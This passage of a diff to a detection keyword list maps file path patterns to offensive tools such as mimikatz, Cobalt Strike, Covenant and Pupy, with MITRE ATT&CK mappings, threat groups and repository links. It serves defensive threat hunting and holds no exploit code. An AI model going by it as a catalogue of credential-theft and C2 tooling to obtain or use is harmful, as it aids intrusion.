can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/mimikatz.sln*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypass/mimikatz.py*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypass/mimikatz2.py*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypassAV/main.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_bypassAV/mimikatz_load.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimikatz_load.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilib.def*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilove.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilove.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimilove.rc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimipenguin.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/mimipenguin.c*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*/mimipenguin.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/mimipenguin.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/mimipenguin/*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*/mimipenguin/*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*/mimipy.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/mimipy.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/mimishim/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/minidump.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/minimal_elf.h*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" -"*/mirai_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/mirai_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/Misc/donut.exe*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" -"*/mitmAP*","offensive_tool_keyword","mitmAP","A python program to create a fake AP and sniff data","T1563 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/xdavidhu/mitmAP","1","1","N/A","N/A","10","1619","282","2019-11-03T11:34:06Z","2016-10-22T21:49:25Z" +"*/mitmAP*","offensive_tool_keyword","mitmAP","A python program to create a fake AP and sniff data","T1563 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/xdavidhu/mitmAP","1","1","N/A","N/A","10","1620","282","2019-11-03T11:34:06Z","2016-10-22T21:49:25Z" "*/mmouse-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mmouse-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Mockingjay_BOF.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" "*/modbus-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Models/PowerShellLauncher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/Models/Regsvr32Launcher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/Models/ShellCodeLauncher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/Modlishka.git*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*/Models/PowerShellLauncher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Models/Regsvr32Launcher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Models/ShellCodeLauncher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Modlishka.git*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" "*/module/darkexe/*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" -"*/Modules/Exitservice/uinit.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*/modules/payload/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 